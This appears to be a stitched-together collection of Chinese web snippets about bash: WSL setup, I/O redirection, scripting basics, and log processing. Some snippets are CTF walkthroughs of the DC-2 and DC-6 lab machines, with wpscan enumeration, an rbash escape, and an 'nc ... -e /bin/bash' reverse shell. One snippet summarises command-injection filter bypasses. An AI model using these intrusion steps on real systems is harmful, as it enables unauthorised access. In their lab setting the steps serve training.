设置shell默认启动 由于Windows10 Bash是通过在命令行中bash命令直接启动Linux的Bash软件,可通过修改.bashrc文件使得fish等shell默认启动。...保存文件后推出Bash并重启即可。 ?...选编自:https://www.howtogeek.com/258518/how-to-use-zsh-or-another-shell-in-windows-10/
背景 最近一家公司在使用mac做为开发机,的确使用nodejs以及相关生态非常爽,家中的联想笔记本就明显不太方便了,装黑苹果又带不起来,听说win10上面自带的bash还可以,就启用了玩玩。...2.适用于Linux的windows子系统 ? 3.选择启动或关闭windows功能,找到适用于Linux的windows子系统 ?...4.搜索bash-安装 根据提示安装,从windows商店时间比较长 ?...安装成功 根据提示输入linux用户名和密码 可以搜索到 bash on ubuntu on windows,启用成功,这个bash现在非常牛逼,已经内置node.js 7.9 和nvm了,还有其他的内置软件我还没有研究...来源:how-to-uninstall-or-reinstall-windows-10s-ubuntu-bash-shell 配置 由于自带的终端实在不顺手,于是我使用cmder来使用终端 链接:cmder
但是自己又不希望通过主域名的二级目录进行访问,而 是希望通过主域名的二级域名进行访问。所以这个时候就会用到URL重定向。 ...重定向 URL重定向主要是指主域名主域名www.xusseo.com下的二级目录,如www.xusseo.com/wap,但是由于wap是一个新的站点,所以正确的域名应该是应该是wap.xusseo.com...参考代码 1 # coding:utf-8 2 import requests 3 # 请求头 4 headers = { 5 "User-Agent": "Mozilla/5.0 (Windows...opt=1', 10 headers=headers, 11 allow_redirects=False, 12 verify=False) 13 # 打印状态码,自动处理重定向请求 14 print...,setdefault的作用是给字典键名allow_redirects赋值,如果该键不存在,赋给其默认值,也就是第二参数True。
shell的全路径名LOGNAME:当前用户的登录名PS1:shell命令行界面的主提示符位置参数变量用于向命令或程序脚本中传递信息$n:n为数字,$0代表命令(脚本)本身,$1~$9代表第1~9个参数...,10以上的参数需要用大括号包含,如${10}$* :代表命令行中所有参数,把所有参数看成一个整体$@:也代表命令行中所有参数,不过$@把每个参数区别对待$#:代表命令行中所有参数的个数#参数传递的优点...= STRING2 #两字符串是否不同 STRING1 字典排序在字符串2前面则返回TRUE,> 同理文件判断 -a FILE #文件是否存在 -d FILE...2:标准误输出流示例##写三句命令,两句正确一句错误vim test.shcat test.shpwdpwdppp##1 不进行重定向,结果直接输出到标准输出流(屏幕)bash test.sh/trainee...(屏幕)bash test.sh > out.logtest.sh: line 3: ppp: command not found##3 进行分开重定向,正确与错误分别进入两个log文件bash test.sh
包含启动控制台(bash、sh)等信息。用户换机和启动程序可以使用cat ~/.bash_profile cat /etc/bash*: 使用bash控制台的启动文件。是使用系统广泛的功能和别名。...(这里可能是/etc/bashrc 或者 /etc/bash.bashrc,所有使用通配符代替) cat ~/.bash_history: 打印当前用户bash命令的历史记录(也可以直接输入history...权限一共是10个字符,第1个字符分为1组,后面9个字符分为3组。...同时正斜线可以和星号一起使用,例如*/10,如果用在分钟字段,表示每十分钟执行一次。...我们自己的公钥也需要使用ssh-keygen来生成,如果是Windows也没关系 Windows10之后的系统都自带ssh!
攻击机:Kali Linux 靶机环境:192.168.241.136 所用工具:nmap | cewl | wpscan | hydra 0x01 知识点 WordPress 绕过受限bash Git...192.168.241.136 -p- 扫描端口及服务,发现7744为ssh服务 nmap -sV -sC -O 192.168.241.136 -p 7744,80 值得注意的是: 发现开了80端口却无法访问,是重定向到...dc-2域名 可改如下hosts文件 win10路径:C:\Windows\System32\drivers\etc\hosts linux路径:etc/hosts 添加ip对应域名 0x03...获取权限 发现页面存在Flag1,直接点击访问 提示使用cewl工具生成字典,登录账号发现下一个Flag 果断用wpscan列出用户 wpscan --url http://dc-2 -e u admin...限制一些会对系统造成危害的危险命令 为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 直接rbash绕过获取到flag3.txt内容 tom@DC-2:~$ BASH_CMDS
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds 发现开了80端口却无法访问,是重定向到dc-2域名,可改hosts文件访问,添加...ip对应域名 win10路径:C:\Windows\System32\drivers\etc\hosts linux路径:etc/hosts 渗透实战 查看页面为wordpress的cms且页面有flag...用cewl来做字典 且登录进去才有可以拿到下一个flag 果断用wpscan列出用户 wpscan --url http://dc-2 -e u admin tom jerry 用cewl生成字典 cewl.../tom tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found 发现是一个受限的bash...,直接rbash绕过获取到flag3.txt内容 tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a # 赋值给a $ export PATH=$PATH:/bin/ # 导入环境变量
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds 发现开了80端口却无法访问,是重定向到dc-2域名,可改hosts文件访问,添加...ip对应域名 win10路径:C:\Windows\System32\drivers\etc\hosts linux路径:etc/hosts 渗透实战 查看页面为wordpress的cms且页面有flag...提示 用cewl来做字典 且登录进去才有可以拿到下一个flag 果断用wpscan列出用户 wpscan --url http://dc-2 -e u admin tom jerry 用cewl生成字典.../tom tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found 发现是一个受限的bash...,直接rbash绕过获取到flag3.txt内容 tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a # 赋值给a $ export PATH=$PATH:/bin/ # 导入环境变量
前面已经说过,最终的脚本我只用了20多行,处理10GB的日志,20秒左右就得到了结果。考虑到排序的巨大计算量,这样的结果非常令人满意,充分证明了Bash的威力。...接着,将排序结果重定向到文件www-01.result。单个日志分析就完成了。 五、月度汇总排名 经过上一步之后,1月份的31个日志文件,生成了31个对应的分析结果文件。...(10)sort -rn > final.log.result 对awk脚本的处理结果进行排序,sort默认使用第一个字段,参数r表示逆序,从大往小排;参数n表示以数值形式排序,不以默认的字典形式排序,...否则会出现10小于2的结果。...排序结果重定向到final.log.result。至此,月度排名完成。 六、脚本文件 用一个脚本,包含上面两节所有的内容。 #!
output )2 - denotes stderr ( standard error )/dev/null就相当与windows里的回收站,只是进去了不能再出来了。...把这10万个文件删掉后,一切恢复正常 问题现象: linux操作系统中的/var/spool/clientmqueue/目录下存在大量文件。...就执行下面的命令: # cd /var/spool/clientmqueue # ls | xargs rm -f 在一個風和日麗的夜晚,我坐在家裡看著電視,後來手機一陣響起,結果是楊老師發現一台主機發生異常...那個 error 是: bash: /bin/rm: Argument list too long 雖然無法刪除,但是楊兄並不放棄,到主機面前,開啟了 X Window 之後使用那 Linuxer 最常使用的鸚鵡螺...mkfile.sh root # 會產生 20000 個小檔案,名稱為 test-file-{1~19999} 直接使用 rm 去刪除: root # rm -rf test-file-* -bash
WSL是什么 WSL 是Windows Subsystem for Linux 的简称,主要是为了在Windows 10上原生运行Linux二进制可执行文件(ELF格式),而提供的兼容层。...在Windows功能中启用```适用于Linux的Windows子系统```,然后在Windows CMD中直接输入```bash```,即可进入Linux环境,执行命令: ? 2....WSL新特性 从Windows10 1709版本时开始,可以直接输入wsl进入交互环境, bash方式会逐渐废弃掉。...以前的 bash -c [command]直接用 wsl [command]来替代。 另一个特性是:Windows 10商店里,可以下载安装其他Linux发行版。...5.3 重定向 思路是定义command_not_found_handle函数(bash 4.0+ 支持),当任何命令找不到时,都会调用调用它。
root 64 Apr 3 10:13 2 -> /dev/null 32324 lrwx------ 1 root root 64 Apr 3 10:13 3 -> /dev/null 每一个进程在运行时都会打开一些文件...error.txt 文件中 (错误不在输出) > whomi -bash: whomi: command not found > whomi 2> error.txt > cat error.txt...-bash: whomi: command not found 范例 2:将date输出的内容重定向到date.txt > date 1> date.txt > cat date.txt Sun Apr...linxu root root > grep 'root' < /etc/passwd root:x:0:0:root:/root:/bin/bash operator:x:11:0:operator:...当需要让一组命令在不同目录下执行时,采用这种方法可以不修改主脚本的目录。 请仔细看当前目录,一直处于home目录中,不加括号则返回到了root目录下。
/bin/bash 表示这是一个Bash脚本。2、my_function() 定义了一个名为my_function的函数。在函数名称后面的括号内可以包含参数,但在这个示例中,我们没有使用任何参数。...Shell 输入/输出重定向这些示例展示了如何使用不同的输入/输出重定向操作符来处理命令的输入和输出。你可以根据具体的需求,将这些示例中的操作符和命令组合起来使用。...1、标准输出重定向 (>) 示例:# 将ls命令的输出写入到file.txt文件中ls > file.txt2、追加输出重定向 (>>) 示例:# 将echo的输出追加到file.txt文件的末尾echo.../bin/bash# 这是脚本2.sh的内容echo "这是脚本2.sh"现在,你可以创建一个主脚本,将这两个文件包含进来。主脚本.sh:#!...脚本1.sh# 包含脚本2.shsource 脚本2.sh# 主脚本的内容echo "这是主脚本"# 运行脚本1.sh和脚本2.sh中的命令这样,你可以将一些通用的功能放在单独的脚本文件中,然后在需要的地方包含它们
在 Windows 上,有几种方法可以体验 Bash,包括微软官方支持的 Windows Subsystem for Linux(WSL)。 安装 Bash 后,打开你最喜欢的文本编辑器并准备开始。...在 Bash 中援引文件 当你在 Bash 中 “ 援引(source)” 一个文件时,你会让 Bash 读取文件的内容,期望它包含有效的数据,Bash 可以将这些数据放入它建立的数据模型中。...另外,你可以使用 Bash 内置的东西:重定向。重定向本身并不是很有用,所以在这个例子中,我也使用内置的 echo 命令来打印重定向的结果: #!...在 Bash 中,你可以使用常见的 shell 重定向将数据保存到文件中。 例如, 要创建一个包含输出的新文件, 使用一个重定向符号: #!.../date.sh $ cat date.txt Tue Feb 23 22:25:12 UTC 2021 要追加数据,使用两个重定向符号: #!
192.168.241.139 -p 80,22 -oN 139.xml 综上信息搜集可以发现,该目标系统为Linux,开放22和80端口,其中web服务是用的Wordpress框架,根据经验,重点从web上突破,考虑用字典爆破后台和...ssh服务的账号密码 值得注意的是:发现开了80端口却无法访问,是重定向到wordy域名 可在如下hosts文件中添加ip对应域名 win10路径:C:\Windows\System32\drivers...获取到账号密码 mark helpdesk01 进入后台发现有个active管理插件命令执行漏洞 直接抓包使用nc反弹shell nc 192.168.241.129 2222 -e /bin/bash...connect to [192.168.241.129] from wordy [192.168.241.139] 36108 python -c "import pty;pty.spawn('/bin/bash...nc 192.168.241.129 2223 -e /bin/bash graham@dc-6:/home/jens$ sudo -u jens .
chown -R jianzuoyi:jianzuoyi dirname # 将目录以及目录内的文件的所有权给jianzuoyi sort, uniq - 排序,去重 sort file # 默认按字典序对文件进行排序...stderr):代码为 2,使用 2>或 2>> &> 标准输出和错误输出同时重定向 /dev/null 代表垃圾箱,不想要保存的东西都可以重定向到这里 输出重定向就是将命令的结果重定向到文件,而不是输出到屏幕...但是很多时候文件是从 Windows 或 Mac 系统上传到 Linux 服务器上的,这可能导致文件格式不兼容,原因是不同平台生成的文本文件的换行符不一样。...操作系统 符号 正则表达式 Mac ^M \r Linux $ \n Windows ^M$ \r\n cat -A file # 查看文件换行符情况 dos2unix file # Windows.../run.sh bash run.sh sh run.sh # 前提sh链接到了bash,如果没有,需要root权限执行命令:ln -sf /bin/bash /bin/sh # 脚本在前台执行,标准输出和标准错误保存到文件
命令执行漏洞绕过方法总结 操作系统管道符 Windows系统管道符 | :直接执行后面的语句,|前面的命令结果作为后面命令的参数 || :前面的命令执行成功,则后面的命令不会执行;前面的命令执行失败...URL编码为%26才能正常执行cmd=%26cat /flag && :如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 linux系统管道符 |、||、&、&&这四种管道符都存在且用法和Windows.../bin/whoami 4、重定向 重定向字符 < :用于将文件的内容作为输入提供给命令 示例: cat flag.txt cat<flag.txt **重定向字符 **:用于打开文件并同时进行读取和写入...catflag.txt bash变量绕过 c=ami;who$_ :$_代表前面一个命令的结果。...\\ #>10.\\ #>10.\\ #>10.\\ #>c\ \\ #>\n\\ #ls -t > zian #sh zian 攻击机监听即可 无回显时间盲注 1、sleep sleep 5 理解
Ken Thompson 的 sh 是第一种 Unix Shell,Windows Explorer 是一个典型的图形界面 shell。 .../0 lrwxrwxrwx 1 root root 15 9月 2 10:02 /dev/stdout -> /proc/self/fd/1 2.5 重定向操作 类型 操作符 用途 重定向输入 重定向到 log.txt 文件中,同时将标准错误也重定向到 log.txt 文件中 ..../bin/bash #输出 10 次 hello world a=10 for i in `seq $a` do echo "hello world" done ————————————————————.../bin/bash for ((i=0;i10;i++)); do for((j=0;j10;j++)); do [ $j -eq 5 ] && continue 2 echo $j done echo
文件重定向 文件重定向是Shell中常用的功能之一,它允许我们在执行命令时,改变输入源和输出目标。下面是介绍文件重定向涉及到的三个特殊符号: >:将标准输出重定向到文件中(覆盖原有内容)。...4.2 引入外部脚本案例 4.2.1 例子1:在主脚本中引入helper.sh脚本,并调用其中的函数 main_script.sh: #!/bin/bash . ..../bin/bash greet() { echo "Hello, $1!"...} 以上例子在主脚本main_script.sh中引入了外部脚本helper.sh,并调用其中的greet函数,传递参数打印问候语。.../bin/bash username="alice" password="123456" main_script.sh: #!/bin/bash source .
领取专属 10元无门槛券
手把手带您无忧上云